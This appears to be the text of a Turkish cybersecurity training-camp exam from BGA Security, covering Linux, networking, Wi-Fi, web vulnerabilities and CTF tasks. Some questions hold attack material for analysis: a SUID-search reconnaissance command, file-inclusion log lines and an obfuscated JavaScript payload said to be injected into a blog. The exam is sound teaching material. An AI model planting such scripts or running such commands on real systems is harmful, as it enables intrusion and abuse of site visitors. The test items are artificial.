  • 5. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 9: Linux tabanlı bir sistem üzerinde aşağıdaki gibi bir durum mevcuttur. -r-------- 1 root root 56112 May 2 2017 /bin/chmod ---------- 1 user user 92189 Jan 17 2017 /home/user/questions.txt Yukarıdaki duruma göre questions.txt dosyasının içini okumak isteyen root kullanıcısı aşağıdakilerden hangisini yapabilir? A) vi ya da nano kullanarak dosyayı açmalı. B) questions.txt dosyasına okuma izni vererek dosyayı açmalı. C) Dosya user kullanıcısına ait olduğundan root bunu okuyamaz. D) chmod'u yeniden yükleyip, dosyaya okuma izni vererek okumalı. E) questions.txt dosyası artık okunamaz olduğundan çöp dosya olmuştur. SORU 10: Saldırgan bir Linux sunucuya saldırı gerçekleştirmiştir. Analiz esnasında çalıştırılan komutlar arasında yukarıdaki gibi bir komut tespit edilmiştir. Bu komut ile saldırgan ne yapmak istiyor olabilir? find / ( -perm -u+s -or -perm -g+s ) -type f -exec ls -l {} ; A) Kernel versiyonuna ait zafiyetleri bulmak. B) Shell oluşturmak için yazma izni olan dizinleri bulmak. C) root grubuna dahil kullanıcıları bulmak. D) root izinlerinin mevcut olduğu dizinleri bulmak E) root izinlerini kullanabileceği komutları bulmak
  • 6. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 11: Log analizi gerçekleştirirken bir web sunucusunda aşağıdaki kayıtlara rastlanmıştır. Buna göre aşağıdakilerden hangisi ya da hangileri doğrudur? A) Brute force saldırı yapılmıştır. B) Saldırı başarılı olarak sonuçlanmıştır. C) Saldırı başarısız olmuştur. D) Saldırıyı gerçekleştiren sistem gatewaydir. E) Saldırı veritabanına yapılmıştır. F) Saldırı web sunucusunun 16020 portuna yapılmıştır. G) Bu saldırı kullanıcıların sunucu üzerindeki web sitesini ziyaret etmesini engellemektedir. SORU 12: Bir Linux sistem üzerinde aşağıdaki komutları çalıştıran kişi ne yapmayı amaçlar? iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT A) ICMP paketlerine cevap verilmesini engelliyordur. B) SYN flood saldırısını engelliyordur. C) Peer-to-Peer Attack’ı engelliyordur. D) Smurf Attack’ı engelliyordur. E) Slowloris saldırısını engelliyordur. SORU 13: Bir Linux sistem üzerinde aşağıdaki komutu çalıştıran kişi ne yapmayı amaçlar? ssh 192.168.7.13 "sudo /usr/sbin/tcpdump -s0 -w - 'port 80'" | wireshark -k -i - CEVAP: …………………..
  • 7. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 14: Windows sistemlerde DNS çözümleme sırası nasıl gerçekleşmektedir? i) Wins ii) DNS Cache iii) LmHosts Dosyası iv) NetBIOS Name Cache v) Hosts Dosyası vi) Broadcast vii) DNS A) iv-ii-v-vii-vi-i-iii B) ii-v-vii-iv-i-vi-iii C) v-vii-iii-ii-vi-i-iv D) vii-v-ii-iii-i-vi-iv E) iii-ii-v-vii-vi-i-iv SORU 15: Aşağıdakilerden hangisi ya da hangileri DHCP Discover mesajını tanımlar? 1. 2. Katman yayını olarak FF:FF:FF:FF:FF:FF kullanılması 2. UDP protokolü kullanılması 3. TCP protokolü kullanılması 4. 2. katman yayını olarak adres kullanmaması A) Yalnız 1 B) Yalnız 2 C) 1 ve 2 D) 3 ve 4 E) Yalnız 4
  • 8. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 16: Bir saldırgan sonradan dahil olduğu bir kafenin ağında gözüne bir kurban kestirmiştir. Kurbana bir saldırı düzenleyerek yukarıdaki grafikte gösterilen sonucu elde etmiştir. Buna göre saldırgan aşağıdaki saldırılardan hangisini gerçekleştirmiş olabilir? A) ARP Poisining B) SQL Injection C) Error Based XSS D) ARP Spoofing E) ICMP Redirect F) DHCP Mangling G) Smurf Saldırısı H) IP Spoofing I) SYN Flood J) DHCP Session Clicking K) IP Redirect SORU 17: ICMP paketleri ile ilgili olarak aşağıdakilerden hangisi ya da hangileri doğrudur? 1. Bir TCP segmentinin alındığını onaylarlar. 2. Bir datagram alındığını onaylarlar. 3. Cihazlara ağ sorunları hakkında bilgi sağlarlar. 4. IP datagramları içerisinde kapsüllenirler. A) Yalnız 1 B) Yalnız 3 C) 1 ve 2 D) 3 ve 4 E) Hepsi
  • 9. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 18: Aşağıdakilerden hangisi bir router’ın bir uzak bilgisayara yönelik ARP isteğine yanıt vermesini sağlar? A) Gateway DP B) Reverse ARP (RARP) C) Proxy ARP D) Inverse ARP (IARP) E) Hiçbiri SORU 19: KRACK zafiyeti ile ilgili olarak aşağıdaki ifadelerden hangisi ya da hangileri doğrudur? A) Kablosuz ağın parolasını bulmak için kullanılır. B) WPA-TKIP kullanılarak saldırı önlenebilir. C) AES-CCMP kullanmak saldırıyı önlemez. D) WPA1 bu saldırıdan etkilenir; ancak WPA2 etkilenmez. E) Saldırıyı hafifletmek için 802.11r özelliği devre dışı bırakılabilir. F) Kablosuz ağ cihazının WPS özelliğini kapatmak saldırıyı önleyebilir. G) Bu saldırı kablosuz ağın PSK bilgilerini bilmeden ağ trafiğini görüntülemeyi sağlar. SORU 20: Aşağıdakilerden hangisi en güçlü kablosuz sinyal şifrelemesi sunar? A) WAP B) WEP C) WPA D) WINS E) WIN SORU 21: WPA2 için güvenlik standardı aşağıdakilerden hangisidir? A) 802.11ad B) 802.11i C) 802.11n D) 802.11a E) 802.11b
  • 10. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 22: Aşağıdaki kodun barındırdığı zafiyet nedir? A) SQL Injection B) Dom based XSS C) Stored XSS D) File Inclusion E) Command Injection SORU 23: Aşağıdaki kodun barındırdığı zafiyet nedir? A) CSRF (Cross-Site Request Forgery) B) SQL Injection C) Command Injection D) Reflected XSS E) IDOR (Insecure Direct Object Reference)
  • 11. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 24: Aşağıdaki kod parçacığını inceleyen bir siber güvenlik uzmanı aynı zamanda web loglarını da incelediğinde bol miktarda… GET /index.php?file=index.php HTTP/1.0 GET /index.php?file=index.php HTTP/1.0 GET /index.php?file=index.php HTTP/1.0 …loglarını görmektedir. Bu saldırıya ne ad verilmektedir? A) SQL injection B) Cross-Site Request Forgery C) Reflected XSS D) Denial of Service E) Directory Traversal
  • 12. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 25: Web sitesi oldukça fazla ziyaret edilen bir blogger, web sitesinin kaynak kodunu incelediğinde aşağıdaki kodun bulunduğunu fark etmiştir. Bu kod ne ifade eder? $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$] +"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$, $__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$ $]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$. $;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+"" +$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.$__+$.___+""+$.__$+$.$_$+ $.$_$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+" "+$.$__+$.___+"="+$.$__+$.___+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$. $$$+""+$.$__+$.___+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+ $.$_$+$.$$_+""+$.__$+$.__$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$$_+$.$$_+$. $$$_+"."+$.__$+$.___+$.__$+""+$.__$+$.$_$+$.$$_+$._$+""+$.__$+$.$_$+$.$$_+"" +$.__$+$.$$$+$.__$+""+$.__$+$.$_$+$.$_$+$._$+$._+""+$.__$+$.$$_+$._$$+"('"+$._ _$+$.$_$+$._$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$ +"_"+$._$+$.$$$$+"_"+$.__+""+$.__$+$.$_$+$.___+$.$$$_+"_"+$.__$+$.$_$+$.$_$+" "+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+""+$.__$ +$.$$_+$._$$+"',"+$.$__+$.___+"{"+$.__$+$.$_$+$.$_$+""+$.__$+$.$_$+$.__$+""+$ .__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"."+$.__$+$.$$_+$._$$+$.__+$.$_$_+ ""+$.__$+$.$$_+$._$_+$.__+"();}"+""")())(); A) Başka bir siteye ddos saldırısı yapmak istemektedir. B) Siteye giren kullanıcılara zararlı yazılım indirterek botnet ağı kurmaktadır. C) Siteye giren kullanıcıların işlem gücünü kullanarak mining(madencilik) yapmaktadır. D) Siteye giren kullanıcıların kimlik bilgilerini çalmaktadır. E) Siteyi başka bir adrese yönlendirmektedir. SORU 26: Bir sisteme sızan iki saldırgan arasındaki konuşmalarda aşağıdaki gibi şifreli bir mesaj geçmektedir. Bu mesajın ne anlama geldiğini açıklayınız. 77774442233777552672288777733663323266232 CEVAP: …………………………..
  • 13. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 27: Bir bankanın saldırı almasından sonra yetkililer kredi kartı bilgilerinin sızdırılmış olabileceğinden şüpheleniyor. Gerçekleştirilen analiz işlemlerinden sonra çok sayıda wav dosyasının sızdırıldığını tespit ettik. Sizce bu ses kaydı ne anlama gelmektedir? [sample.wav] İndir; https://files.fm/u/7utccbbt CEVAP: ………………………………….. SORU 28: Aşağıdaki lokasyona gitmek için gizli bir bayrak ekledik. Bayrağı bulabilir misiniz? CEVAP: ……………………………… SORU 29: Aşağıdaki uygulamayı çalıştırdık ancak bayrağı bulamıyoruz. Bulabilir misin? [Sample.elf] İndir; https://files.fm/u/4ybbhh77 CEVAP: ……………………………
  • 14. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 30: Ağ alt yapısında DMZ nereye kurulmalıdır? A) İç ağ ile güvenlik duvarı arasına B) İç ağa; ancak doğrudan güvenlik duvarına bağlı değil C) Dış ağ ve güvenlik duvarı arasına D) Güvenlik duvarının arkasında; ancak iç ağa doğrudan bağlı olmadan E) Güvenlik duvarının önüne; ancak doğrudan iç ağa bağlı olarak SORU 31: Saldırı tespit sisteminin iki türü nedir? A) Anomaly and signature B) Passive and active C) Internal and external D) Host and network E) Dynamic and directly SORU 32: Saldırı önleme sisteminin iki türü nedir? A) Anomaly and signature B) Passive and active C) Internal and external D) Host and network E) Dynamic and directly SORU 33: Aşağıdakilerden hangisi asimetrik anahtar şifrelemesi kullanmaktadır? A) AES B) PGP C) 3DES D) RC5 E) DES SORU 34: OSI modelinin ağ katmanında çalışan güvenlik duvarlarının iki türü aşağıdakilerden hangisidir? A) Stateful and stateless B) Dynamic and static C) Anomaly and signature D) Mandatory and discretionary E) Passive and active
  • 15. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 35: Değerli bilgiler taşıyan bir sistem izole edilmiş bir ağ içerisinde sürekli olarak izlenecek şekilde konumlandırılmıştır. Bu ne amaçla yapılan bir güvenlik tedbiridir? A) Pseudo-network B) Honeypot C) Virtual Network D) Canary Trap E) VPN SORU 36: Rol tabanlı erişim denetim listelerinin iki türü aşağıdakilerden hangisidir? A) Mandatory and discretionary B) Object and permission C) Filesystem and networking D) Dynamic and static E) Passive and active SORU 37: Aşağıdakilerden hangisi Pseudo/Virtual dosya sistemleri arasında yer almaz? A) Devfs B) Debugfs C) Tmpfs D) Ext3 E) Winfs SORU: 38: Hangisi bir zararlıyı diske yazıldığı anda tespit edebilen bir AV yeteneğidir. A) In-Memory Scan B) On-Demand C) On-Access D) Heuristic Engine E) Static Analysis SORU 39: Hangisi, Zararlıların istismar aşamasına geçtiklerinde kullandıkları ve yıkıcı etkiye sahip varlıklarına verilen addır. A) Shellcode B) Payload C) Pseudo-Code D) Opcode E) Hexcode
  • 16. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 40: Hangisi bir güvenlik çözümüne yakalanmadan, exploitin/zararlının hedefine ulaşmasına yol açan tekniklere verilen isimdir. A) Bypass B) Injection C) Massive Attack D) Blinding E) Evasion SINAV SÜRESİ: 3 Saat Sınavımız tamamlandı. Detaylı bilgi için siberkamp@bga.com.tr adresimiz ile iletişime geçebilirsiniz.
  • 17. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity BGA Bilgi Güvenliği A.Ş. Hakkında BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir. Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet vermektedir. Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil Güvenlik Çözümleri” oluşturmaktadır. Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına 1.000'den fazla eğitim ve danışmanlık projeleri gerçekleştirmiştir. BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları düzenlenmesi ve sosyal sorumluluk projeleri gibi birçok konuda gönüllü faaliyetlerde bulunmuştur. BGA Bilgi Güvenliği AKADEMİSİ Hakkında BGA Bilgi Güvenliği A.Ş.’nin eğitim ve sosyal sorumluluk markası olarak çalışan Bilgi Güvenliği AKADEMİSİ, siber güvenlik konusunda ticari, gönüllü eğitimlerin düzenlenmesi ve siber güvenlik farkındalığını arttırıcı gönüllü faaliyetleri yürütülmesinden sorumludur. Bilgi Güvenliği AKADEMİSİ markasıyla bugüne kadar “Siber Güvenlik Kampları”, “Siber Güvenlik Staj Okulu”, “Siber Güvenlik Ar- Ge Destek Bursu”, “Ethical Hacking yarışmaları” ve “Siber Güvenlik Kütüphanesi” gibi birçok gönüllü faaliyetin destekleyici olmuştur.